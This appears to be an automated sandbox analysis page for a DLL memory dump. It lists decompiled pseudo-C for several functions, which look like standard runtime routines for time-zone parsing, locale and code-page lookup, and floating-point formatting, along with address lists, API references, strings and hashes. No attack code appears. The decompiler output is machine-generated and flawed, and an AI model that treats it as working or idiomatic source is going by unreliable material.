									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6E20BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6E20BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6E218225()) = _v8;
										_t128 = E6E218219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6E223B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

0x6e21877c
0x6e218786
0x6e21878b
0x6e21878f
0x6e218791
0x6e218799
0x6e2187a4
0x6e218944
0x6e218946
0x6e218947
0x6e218948
0x6e218949
0x6e21894a
0x6e21894b
0x6e218950
0x6e218954
0x6e218956
0x6e218959
0x6e218960
0x6e218964
0x6e218967
0x6e21896b
0x6e21896e
0x6e218971
0x6e218976
0x6e218977
0x6e218979
0x6e218aa1
0x6e218aa1
0x6e218aa2
0x6e218aa3
0x6e218aa4
0x6e218aa5
0x6e218aa6
0x6e218aab
0x6e218aae
0x6e218aaf
0x6e218ab7
0x6e218abe
0x6e218ac1
0x6e218ace
0x6e218ad5
0x6e218ad6
0x6e218ad7
0x6e218add
0x6e218aec
0x6e218af3
0x6e218afb
0x6e218afd
0x6e218b07
0x6e218b0a
0x6e218b17
0x6e218b1a
0x6e218b1c
0x6e218b35
0x6e218b3d
0x6e218b3f
0x6e218b45
0x6e218b4a
0x6e218b41
0x6e218b41
0x00000000
0x6e218b41
0x6e218b1e
0x6e218b1e
0x6e218b1f
0x6e218b1f
0x6e218b1f
0x6e218b4c
0x6e218aff
0x6e218aff
0x6e218aff
0x6e218b59
0x6e218b5b
0x6e218b5d
0x6e218b5f
0x6e218b6f
0x6e218b6f
0x6e218b61
0x6e218b61
0x6e218b64
0x00000000
0x6e218b66
0x6e218b66
0x6e218b67
0x6e218b6c
0x6e218b64
0x6e218b75
0x6e218b80
0x6e218b8b
0x6e21897f
0x6e218983
0x6e218988
0x6e218989
0x6e21898b
0x00000000
0x6e218991
0x6e218995
0x6e21899a
0x6e21899b
0x6e21899d
0x00000000
0x6e2189a3
0x6e2189a9
0x6e2189ae
0x6e2189b4
0x6e2189bb
0x6e2189c1
0x6e2189c4
0x6e2189ca
0x6e2189d1
0x6e2189d7
0x6e2189db
0x6e2189e1
0x6e2189e4
0x6e2189eb
0x6e2189f0
0x6e2189f0
0x6e2189f2
0x6e2189f2
0x6e2189f5
0x6e2189fc
0x6e218a14
0x6e218a14
0x6e218a17
0x6e2189fe
0x6e2189fe
0x6e218a03
0x6e218a05
0x00000000
0x6e218a07
0x6e218a09
0x6e218a0f
0x6e218a0f
0x6e218a05
0x6e218a1f
0x6e218a33
0x6e218a39
0x6e218a3b
0x6e218a49
0x6e218a4b
0x6e218a3d
0x6e218a3d
0x6e218a40
0x00000000
0x6e218a42
0x6e218a44
0x6e218a44
0x6e218a40
0x6e218a60
0x6e218a67
0x6e218a69
0x6e218a78
0x6e218a7b
0x6e218a6b
0x6e218a6b
0x6e218a6e
0x00000000
0x6e218a70
0x6e218a73
0x6e218a73
0x6e218a6e
0x6e218a69
0x6e218a85
0x6e218a8f
0x6e218a94
0x6e218a99
0x6e218aa0
0x6e218aa0
0x6e21899d
0x6e21898b
0x6e2187bc
0x6e2187bc
0x6e2187c2
0x6e2187c7
0x6e2187fd
0x6e2187fe
0x6e218804
0x6e218806
0x6e218806
0x6e218809
0x6e218809
0x6e21880b
0x6e21880c
0x6e218812
0x6e21881d
0x6e218822
0x6e218827
0x6e218831
0x00000000
0x6e218837
0x6e218837
0x6e218839
0x6e21883a
0x6e21883a
0x6e21883d
0x6e21883d
0x6e21883f
0x6e218840
0x6e218847
0x6e21884c
0x6e218851
0x6e218856
0x6e21885e
0x6e21885f
0x6e218865
0x6e21886a
0x6e21886f
0x6e218875
0x6e21887a
0x6e21887b
0x6e21887e
0x00000000
0x00000000
0x00000000
0x6e21887e
0x6e218883
0x6e218884
0x6e218889
0x6e21888b
0x6e21888b
0x6e218893
0x6e218899
0x6e21889c
0x6e21889c
0x6e2188a0
0x00000000
0x00000000
0x6e2188aa
0x6e2188aa
0x6e2188ad
0x6e2188b0
0x6e2188b2
0x6e2188c0
0x6e2188c2
0x6e2188cc
0x6e2188cc
0x6e2188ce
0x6e2188d0
0x00000000
0x00000000
0x6e2188c7
0x6e2188c9
0x6e2188cb
0x6e2188cb
0x00000000
0x6e2188cb
0x00000000
0x6e2188c9
0x6e2188d2
0x6e2188d5
0x6e2188d7
0x6e2188e2
0x6e2188e4
0x6e2188ee
0x6e2188ee
0x6e2188f0
0x6e2188f2
0x00000000
0x00000000
0x6e2188e9
0x6e2188eb
0x6e2188ed
0x6e2188ed
0x00000000
0x6e2188ed
0x00000000
0x6e2188eb
0x6e2188ee
0x6e2188d5
0x6e2188f4
0x6e2188f4
0x6e2188f6
0x6e2188fa
0x6e2188fa
0x6e2188ff
0x6e218901
0x6e218904
0x6e218907
0x6e218909
0x6e21890c
0x6e218924
0x6e218927
0x6e21892a
0x6e218932
0x6e218937
0x6e21893c
0x00000000
0x6e21893c
0x6e21890e
0x6e218913
0x6e218916
0x6e21891b
0x6e21891e
0x6e218920
0x00000000
0x00000000
0x6e218922
0x6e21886f
0x00000000
0x6e218856
0x6e2187c9
0x6e2187c9
0x6e2187cb
0x6e2187cd
0x6e2187cd
0x6e2187d1
0x00000000
0x00000000
0x6e2187d5
0x6e2187e9
0x6e2187e9
0x6e2187d7
0x6e2187d7
0x6e2187d7
0x6e2187dd
0x00000000
0x6e2187df
0x6e2187df
0x6e2187e2
0x6e2187e7
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2187e7
0x6e2187dd
0x6e2187f2
0x6e2187f4
0x6e218943
0x6e218943
0x6e2187fa
0x6e2187fa
0x00000000
0x6e2187fa
0x00000000
0x6e2187f4
0x6e2187ed
0x6e2187ef
0x6e2187ef
0x00000000
0x6e2187ef
0x6e2187c7
0x00000000

APIs

_free.LIBCMT ref: 6E2187FE
_free.LIBCMT ref: 6E218822
_free.LIBCMT ref: 6E2189A9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E232130), ref: 6E2189BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E218A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A70,000000FF,?,0000003F,00000000,?), ref: 6E218A60
_free.LIBCMT ref: 6E218B75

Strings

0!#n, xrefs: 6E218964, 6E21896A
0!#n, xrefs: 6E218AD8

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!#n$0!#n
API String ID: 314583886-3624508691
Opcode ID: 5fe7a4b5223dccb623ad73ffb04ebf3f49cf30559523b6e2c9cb8052e65d9212
Instruction ID: 23a6e4e1c5b83169292d934ed07ee66a08b09556963554a62719022d91549310
Opcode Fuzzy Hash: 5fe7a4b5223dccb623ad73ffb04ebf3f49cf30559523b6e2c9cb8052e65d9212
Instruction Fuzzy Hash: 70C12875A0824EAFDB098FE8C8D4AEA7BFFAF46314F14455AD691D7280E7308B41C761

Uniqueness

Uniqueness Score: -1.00%

Function 6E21DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6E21DD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6E20D5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6E21DD27(" )#nU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6E21D652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6E21D775();
					} else {
						E6E21D6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6E21DD27("t!#nE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6E21D775();
							} else {
								E6E21D6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6E21DBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6e20e042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6E21D5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E202188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6e28506c; // 0x3ec3ee36
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6E20D5FF(_t89, _t100, _t116);
								_t122 =  *(E6E20D5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6E21E4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6E21806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6E21E5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6E1DF8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6E214323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6E214323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6E227BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6E214323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6E227BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6E225124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

0x6e21dd96
0x6e21dd9b
0x6e21dd9c
0x6e21dd9d
0x6e21dd9f
0x6e21dda0
0x6e21dda5
0x6e21dda8
0x6e21ddaa
0x6e21ddad
0x6e21ddad
0x6e21ddb0
0x6e21ddb0
0x6e21ddb6
0x6e21ddb9
0x6e21ddbc
0x6e21ddbc
0x6e21ddbf
0x6e21ddc2
0x6e21ddc8
0x6e21ddca
0x6e21ddcf
0x6e21ddd9
0x6e21ddde
0x6e21dde1
0x6e21dde1
0x6e21dde5
0x6e21dde9
0x6e21de32
0x00000000
0x6e21ddeb
0x6e21ddf0
0x6e21ddf9
0x6e21ddf2
0x6e21ddf2
0x6e21ddf2
0x6e21de00
0x6e21de04
0x6e21de0e
0x6e21de13
0x6e21de18
0x6e21de1e
0x6e21de22
0x6e21de2b
0x6e21de24
0x6e21de24
0x6e21de24
0x6e21de37
0x6e21de37
0x6e21de37
0x6e21de18
0x6e21de04
0x6e21de3d
0x6e21df4f
0x6e21df4f
0x6e21df4f
0x00000000
0x6e21de43
0x6e21de50
0x6e21de56
0x00000000
0x6e21de86
0x6e21de86
0x6e21de8b
0x6e21de8d
0x6e21de8d
0x6e21de8f
0x6e21de8f
0x6e21de94
0x6e21df4a
0x6e21df4c
0x00000000
0x6e21de9a
0x6e21de9a
0x6e21de9d
0x6e21dea5
0x6e21dea8
0x6e21deab
0x6e21deab
0x6e21deae
0x6e21deb1
0x6e21deb9
0x6e21debe
0x6e21dec5
0x6e21deca
0x6e21decd
0x6e21decf
0x6e21df5a
0x6e21df5b
0x6e21df5c
0x6e21df5d
0x6e21df5e
0x6e21df5f
0x6e21df64
0x6e21df68
0x6e21df70
0x6e21df77
0x6e21df7a
0x6e21df7b
0x6e21df7f
0x6e21df85
0x6e21df8d
0x6e21df9c
0x6e21dfa8
0x6e21dfb9
0x6e21dfbf
0x6e21dfc1
0x6e21dfd2
0x6e21dfd9
0x6e21dfdb
0x6e21dfde
0x6e21dfe4
0x6e21dfe6
0x6e21dfe8
0x6e21dfe8
0x6e21dfeb
0x6e21dfee
0x6e21dfee
0x6e21dfe6
0x6e21dff8
0x6e21dfc3
0x6e21dfc3
0x6e21dfc5
0x6e21dfff
0x6e21e000
0x6e21e00b
0x6e21ded5
0x6e21dede
0x6e21dee3
0x6e21dee5
0x00000000
0x6e21dee7
0x6e21dee9
0x6e21df03
0x00000000
0x6e21df05
0x6e21df05
0x6e21df08
0x6e21df0e
0x6e21df11
0x6e21df21
0x6e21df34
0x00000000
0x00000000
0x00000000
0x00000000
0x6e21df13
0x6e21df13
0x6e21df16
0x6e21df1c
0x6e21df1d
0x6e21df1f
0x6e21df36
0x6e21df42
0x00000000
0x00000000
0x00000000
0x00000000
0x6e21df1f
0x6e21df11
0x6e21df03
0x6e21df51
0x6e21df57
0x6e21df57
0x6e21decf
0x6e21de94
0x6e21de56

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E20E042,?,?,?,?,6E20DA1E,?,00000004), ref: 6E21DE78
_wcschr.LIBVCRUNTIME ref: 6E21DF08
_wcschr.LIBVCRUNTIME ref: 6E21DF16
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B n,00000000,?), ref: 6E21DFB9

Strings

)#nU, xrefs: 6E21DDD4
B n, xrefs: 6E21DE8F, 6E21DED7, 6E21DF7F
t!#nE, xrefs: 6E21DE09

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: )#nU$B n$t!#nE
API String ID: 4212172061-4144220597
Opcode ID: 6757db110dfd2b23916a57cf028d6f9966738da2931647a5005137c17de45bbd
Instruction ID: bbbab55976af9d5c1a7ffe5aa649fe409673dd482c809d4b8049263cb240cde8
Opcode Fuzzy Hash: 6757db110dfd2b23916a57cf028d6f9966738da2931647a5005137c17de45bbd
Instruction Fuzzy Hash: 8661D47650824FEBEB149BB5CC45BE773EEEF05706F100869EA199B180EB70E7418B60

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E21E518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6e21e837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e232f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e232f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6E20BF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6e21e837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x6e21e51d
0x6e21e51e
0x6e21e525
0x6e21e5c9
0x6e21e5cf
0x6e21e5e2
0x6e21e5e8
0x6e21e5ed
0x6e21e5ef
0x6e21e5ef
0x6e21e5f5
0x6e21e5fa
0x6e21e5fa
0x6e21e5e4
0x6e21e5e4
0x00000000
0x6e21e5e4
0x6e21e52b
0x6e21e530
0x00000000
0x00000000
0x6e21e536
0x6e21e53b
0x6e21e53d
0x6e21e53d
0x6e21e543
0x00000000
0x00000000
0x6e21e548
0x6e21e55f
0x6e21e55f
0x6e21e568
0x6e21e56a
0x00000000
0x00000000
0x6e21e56c
0x6e21e571
0x6e21e573
0x6e21e573
0x6e21e579
0x00000000
0x00000000
0x6e21e57e
0x6e21e59c
0x6e21e59e
0x6e21e5c1
0x00000000
0x6e21e5c6
0x6e21e5a6
0x6e21e5b9
0x00000000
0x00000000
0x6e21e5bb
0x00000000
0x6e21e5bb
0x6e21e580
0x6e21e588
0x00000000
0x00000000
0x6e21e58a
0x6e21e58d
0x6e21e593
0x00000000
0x00000000
0x00000000
0x6e21e595
0x6e21e597
0x6e21e599
0x00000000
0x6e21e599
0x6e21e54a
0x6e21e552
0x00000000
0x00000000
0x6e21e554
0x6e21e557
0x6e21e55d
0x00000000
0x00000000
0x00000000
0x6e21e55d
0x6e21e563
0x6e21e565
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6E21E837,?,00000000), ref: 6E21E5B1
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6E21E837,?,00000000), ref: 6E21E5DA
GetACP.KERNEL32(?,?,6E21E837,?,00000000), ref: 6E21E5EF

Strings

7!n, xrefs: 6E21E5CF, 6E21E5A6
ACP, xrefs: 6E21E536
OCP, xrefs: 6E21E56C

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: 7!n$ACP$OCP
API String ID: 2299586839-4196688072
Opcode ID: 454be04db5065429e1aec12d0171cd7070d5a62cee135b8deba0232cdc0be799
Instruction ID: 8a2673a683c2d79cb7e5ebb185317e206550357095f6e925e7dbae220fd6e587
Opcode Fuzzy Hash: 454be04db5065429e1aec12d0171cd7070d5a62cee135b8deba0232cdc0be799
Instruction Fuzzy Hash: 33219F6261810EBBE7548FD9CD05BC777F7AB45B25B568414EA0AC7904F722DB40C750

Uniqueness

Uniqueness Score: -1.00%

Function 6E2202BC, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6E220402

Strings

1#QNAN, xrefs: 6E221608
1#IND, xrefs: 6E2215FA
1#SNAN, xrefs: 6E221601
1#INF, xrefs: 6E22160F

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: f600bf36e4b3277cc9f1f59884a3ce03127c49d1613e1755263589ea616fea96
Instruction ID: e8f600435093445fcb0d2ce5d263263677b412c71386115b0c50c3c6aa8634f5
Opcode Fuzzy Hash: f600bf36e4b3277cc9f1f59884a3ce03127c49d1613e1755263589ea616fea96
Instruction Fuzzy Hash: 85C28C71E1822E8FDB65CEA8CD50BDAB3B6EB45305F1041EAD80DE7240E775AE858F40

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E19F, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D65E
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E21E1F3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E21E244
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E21E304

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: c03d12c8b2a131529d33d3c200e4f66e6d2e11bc4368a3a359b77458384dad60
Instruction ID: 5b8e5f1fa1de6f5eee8ccc2751d5238b199230b759b9620e08bfbea18cf15147
Opcode Fuzzy Hash: c03d12c8b2a131529d33d3c200e4f66e6d2e11bc4368a3a359b77458384dad60
Instruction Fuzzy Hash: 7961CD7155820F9FEB588FA4CC95BFA77EAFF04311F10407AEA1186984EB759A90CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E201F6D, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,6E1C75D9), ref: 6E202065
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6E1C75D9), ref: 6E20206F
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,6E1C75D9), ref: 6E20207C

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

